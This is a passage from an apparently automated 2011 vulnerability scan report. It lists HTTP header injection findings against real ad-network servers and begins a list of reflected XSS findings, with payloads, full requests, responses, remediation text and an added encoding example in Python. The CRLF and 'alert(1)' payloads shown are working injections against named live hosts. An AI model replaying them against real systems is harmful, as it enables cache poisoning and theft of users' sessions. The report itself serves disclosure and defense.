Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadj/imdb2.consumer.title/maindetails

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 14526%0d%0a7db69468a61 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadj/imdb2.consumer.title/maindetails;tile=3;sz=1x1,4x1;p=f1;ifb=pf;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;ord=4726988386828452?&14526%0d%0a7db69468a61=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1016
DCLK_imp: v7;j;211364898;0-0;2;32554139;4/1;42349616/42367403/1;;~okv=;tile=3;sz=1x1,4x1;p=f1;ifb=pf;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;;14526
7db69468a61
=1;~cs=i:
Date: Mon, 13 Jun 2011 11:24:46 GMT

document.write('<!-- Template ID = 15350 Template Name = !IMDb - Simple Image Template - DFP Upload -->\n\n<!--\nUSEFUL DFP PLACEHOLDERS :\n DFP Click Thru : http://ad.doubleclick.net/click%3Bh%3Dv
...[SNIP]...

3.2. http://ad.doubleclick.net/pfadj/imdb2.consumer.title/maindetails [tile parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadj/imdb2.consumer.title/maindetails

Issue detail

The value of the tile request parameter is copied into the DCLK_imp response header. The payload 8c2e6%0d%0a02125434862 was submitted in the tile parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadj/imdb2.consumer.title/maindetails;tile=8c2e6%0d%0a02125434862 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 240
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:24:29 GMT
Expires: Mon, 13 Jun 2011 11:24:29 GMT
DCLK_imp: v7;j;44306;0-0;0;32554139;0/0;0/0/0;;~okv=;tile=8c2e6
02125434862
;~cs=t:

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/v;44306;0-0;0;32554139;255-0/0;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt
...[SNIP]...

3.3. http://ad.doubleclick.net/pfadx/fansided_cim/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/fansided_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload a5537%0d%0a4e1cfeec7e4 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/fansided_cim/;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;ord=1307962894346?&a5537%0d%0a4e1cfeec7e4=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 985
DCLK_imp: v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;position=1;ic13=1;sz=24x24;dcmt=text/html;;a5537
4e1cfeec7e4
=1;~cs=k:
Date: Mon, 13 Jun 2011 11:02:01 GMT

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;241934735;0-0;0;63616830;24/24;42394853/42412640/1;;~aopt=3/2/ff/0;~okv=;secure=false;canopy_allowed=false;positio
...[SNIP]...

3.4. http://ad.doubleclick.net/pfadx/fansided_cim/ [secure parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/fansided_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 7615e%0d%0af9020d9662b was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/fansided_cim/;secure=7615e%0d%0af9020d9662b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_10_2&protocol=http%3A&network=fansided
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:01:56 GMT
Expires: Mon, 13 Jun 2011 11:01:56 GMT
DCLK_imp: v7;x;44306;0-0;0;63616830;0/0;0/0/0;;~aopt=2/2/ff/0;~okv=;secure=7615e
f9020d9662b
;~cs=c:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/h;44306;0-0;0;63616830;783-50/50;0/0/0;;~aopt=2/2/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3.5. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php [ES cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d724925/2/725047/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 7f396%0d%0a95abbdc4443 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d724925/2/725047/adscout.php?ord=4df5ee2b64ddd HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1; ES=7f396%0d%0a95abbdc4443

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:12:22 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a210.dl
Set-Cookie: CS1=deleted; expires=Sun, 13-Jun-2010 11:12:21 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2; expires=Fri, 03-Aug-2012 03:12:22 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=7f396
95abbdc4443
_724925-zSN:M-0; expires=Fri, 03-Aug-2012 03:12:22 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

3.6. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 58567%0d%0ab0067a605a1 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /c/58567%0d%0ab0067a605a1/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM?pv=4694778565.317392&cookie=&width=300&height=250&x=0&y=0&keyw=&cpm=g)))TfX9OwANT9wK5X7HoUIl-3PEgN44d0Iq9sK8DQ HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307984779&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966778417&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307966778450&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=785162123&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895298&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=1095&xpc=a0nyvi7KDh&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Mon, 13 Jun 2011 12:07:00 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/58567
b0067a605a1
/SDUW4IOBWFCKJBD7TJN7TI/7e0e346171a4d3507190678e09366eb4.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


3.7. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 6eb1e%0d%0a31147183afa was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=6eb1e%0d%0a31147183afa&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:6eb1e
31147183afa
;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:49 GMT;path=/;domain=.zedo.com;
ETag: "2802d0e-87f1-4a4a580e6a180"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:49 GMT
Content-Length: 2417
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',6eb1e
3114
...[SNIP]...

3.8. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload e47fa%0d%0ac6a295f0dc0 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=e47fa%0d%0ac6a295f0dc0&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:e47fa
c6a295f0dc0
;expires=Tue, 14 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2417
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',e47fa
c6a2
...[SNIP]...

3.9. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImgCmd.act

Issue detail

The value of the gname request parameter is copied into the Set-Cookie response header. The payload bc557%0d%0a14ab2681ee8 was submitted in the gname parameter. This caused a response containing an injected HTTP header.

Request

GET /cTagsImgCmd.act?gtid=5000000440&gcmd=setc&gexpires=172800&gname=bc557%0d%0a14ab2681ee8&gvalue=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771 HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^929ce6feb36d1ee96e6acadee107c6f7^115232130551023312111^1^446224^/^1x1^5000000440^31230390^-1^-1^-1^-1^0^0^6971307962974364^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^bc557
Set-Cookie: bc557
14ab2681ee8
=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771; expires=Wed, 15 Jun 2011 11: 02:54 GMT; path=/; domain=.glam.com;
ETag: "662c9bddfc82c61ba8066514fc2b172e:1276888104"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
Cache-Control: max-age=144
Date: Mon, 13 Jun 2011 11:02:54 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

4. Cross-site scripting (reflected)
There are 285 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: strict validation of input on arrival, and context-appropriate encoding of the data at every point where it is copied into a response (HTML entity encoding for HTML body and attribute contexts, and a different encoding for the JavaScript string contexts seen in the instances below). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
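The following is an added example, not code from the report or from any of the ad networks whose responses appear below. It covers the single-quoted JavaScript string context that findings 4.1 to 4.5 reflect into: it shows why a payload of the scan's shape escapes the literal, how to check where reflected data actually lands, and which encoding keeps it inside the string. The document.write() template, the host name and the function names are constructed here.

```python
# Added example for the script-context findings in this section (4.1 to 4.5
# reflect a parameter into a quoted JavaScript string). It is not code from the
# report or from the ad networks listed; the template and names are constructed.
from urllib.parse import quote

# Payload shape used by the scan in 4.1: closes the string, runs code, reopens it.
SCAN_PAYLOAD = "d7f41'-alert(1)-'77ffbacf38b"

# Constructed stand-in for the document.write() template in finding 4.1.
TEMPLATE = ("document.write('<scr'+'ipt src=\"http://k.constructed.invalid/cmadj/cm.mtv"
            "{value}/ent_010111;\"></scr'+'ipt>');")


def render_unsafe(value: str) -> str:
    """Vulnerable pattern: raw request data dropped into a single-quoted JS literal."""
    return TEMPLATE.format(value=value)


def js_string_encode(value: str) -> str:
    """Encode for a JavaScript string literal: every character outside ASCII
    letters and digits becomes \\xHH (or \\uHHHH above 0xff). With no raw quote,
    backslash, newline or < left, the data cannot end the literal or the script."""
    out = []
    for c in value:
        if c.isascii() and c.isalnum():
            out.append(c)
        elif ord(c) < 0x100:
            out.append("\\x%02x" % ord(c))
        else:
            out.append("\\u%04x" % ord(c))
    return "".join(out)


def render_safe(value: str) -> str:
    """Encode inside-out: the value ends up in a URL path segment inside an HTML
    attribute inside a JS string, so percent-encode for the URL first, then
    JS-encode the result for the literal it is written into."""
    return TEMPLATE.format(value=js_string_encode(quote(value, safe="")))


def code_outside_single_quoted_strings(js: str) -> str:
    """Minimal check of where the reflected data lands: walk the script, skip the
    inside of single-quoted literals (honouring backslash escapes) and return what
    is left. Anything from the payload that appears here executes as code."""
    out, in_str, i = [], False, 0
    while i < len(js):
        c = js[i]
        if in_str:
            if c == "\\":
                i += 2          # escaped character belongs to the literal
                continue
            if c == "'":
                in_str = False
        elif c == "'":
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


if __name__ == "__main__":
    print(code_outside_single_quoted_strings(render_unsafe(SCAN_PAYLOAD)))  # alert(1) is code
    print(code_outside_single_quoted_strings(render_safe(SCAN_PAYLOAD)))    # nothing leaks out
```

HTML entity encoding is the wrong tool for this context: in a .js response or a <script> element the browser does not decode entities, so the value is corrupted, and in an inline event-handler attribute the HTML parser decodes them back into quotes before the JavaScript runs. The \xHH form is understood by the JavaScript parser alone, which is why the encoded value survives the literal intact and nothing from it reaches the code outside.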


4.1. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7f41'-alert(1)-'77ffbacf38b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtvd7f41'-alert(1)-'77ffbacf38b/ent_010111;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtvd7f41'-alert(1)-'77ffbacf38b/ent_010111;sz=728x90;net=cm;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/cm.mtv/ent_010111 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a0df'-alert(1)-'ad6b99e809c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_0101113a0df'-alert(1)-'ad6b99e809c;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
